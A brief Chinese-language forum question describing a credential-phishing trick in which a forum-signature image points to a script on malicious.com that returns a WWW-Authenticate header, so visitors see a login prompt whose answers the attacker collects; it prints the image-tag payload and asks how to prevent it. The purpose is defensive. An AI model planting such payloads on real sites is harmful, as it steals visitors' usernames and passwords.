我从朋友那里听说,WWW-Authenticate可以在远程服务器上的恶意 php 文件中明确定义标头,并使用图像 mimetypeimage/jpeg或image/png.
假设情况
假设这个文件是malicious.com/image.php,我在某个任意论坛上将此图像添加到我的论坛签名中。具体来说,gaiaonline.com。当其他访问者访问包含我的帖子的线程时,他们会看到WWW-Authenticate标题给出的登录提示。在访问者/受害者输入他们的用户名/密码后,黑客可以将其存储在他们的远程服务器上,通过电子邮件发送给自己等。
恶意代码:<img src="malicious.com/image.php" />包含WWW-Authenticate标头。可通过标准发帖/BBcode 输入。
如何解决这个问题?我认为可以为此提供跨域访问。